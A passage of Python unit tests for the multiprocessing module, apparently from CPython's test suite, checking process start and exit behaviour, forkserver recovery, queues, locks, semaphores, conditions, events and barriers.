def _test_child_fd_inflation(self, evt, q):
q.put(os_helper.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# This check is only meaningful for the forkserver start method
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give the forkserver time to die and proc time to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
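# _UpperCaser is a Process subclass that receives strings over a pipe,
# sends back their upper-cased form and exits when it receives None;
# _TestSubclassingProcess drives it from the parent end of the pipe.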
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, encoding="utf-8") as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', encoding="utf-8", closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = os_helper.TESTFN
self.addCleanup(os_helper.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, encoding="utf-8") as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
cases = [
((True,), 1),
((False,), 0),
((8,), 8),
((None,), 0),
((), 0),
]
for args, expected in cases:
with self.subTest(args=args):
p = self.Process(target=sys.exit, args=args)
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, expected)
#
#
#
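# Helpers which fall back to qsize() when the queue object does not
# provide empty()/full().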
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in the buffer but not yet in the pipe, so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shut down until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with os_helper.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w', encoding="utf-8") as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with import_helper.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platforms as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class _DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
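# AppendTrue is a picklable callable used as the Barrier 'action'
# callback in test_action() below.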
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
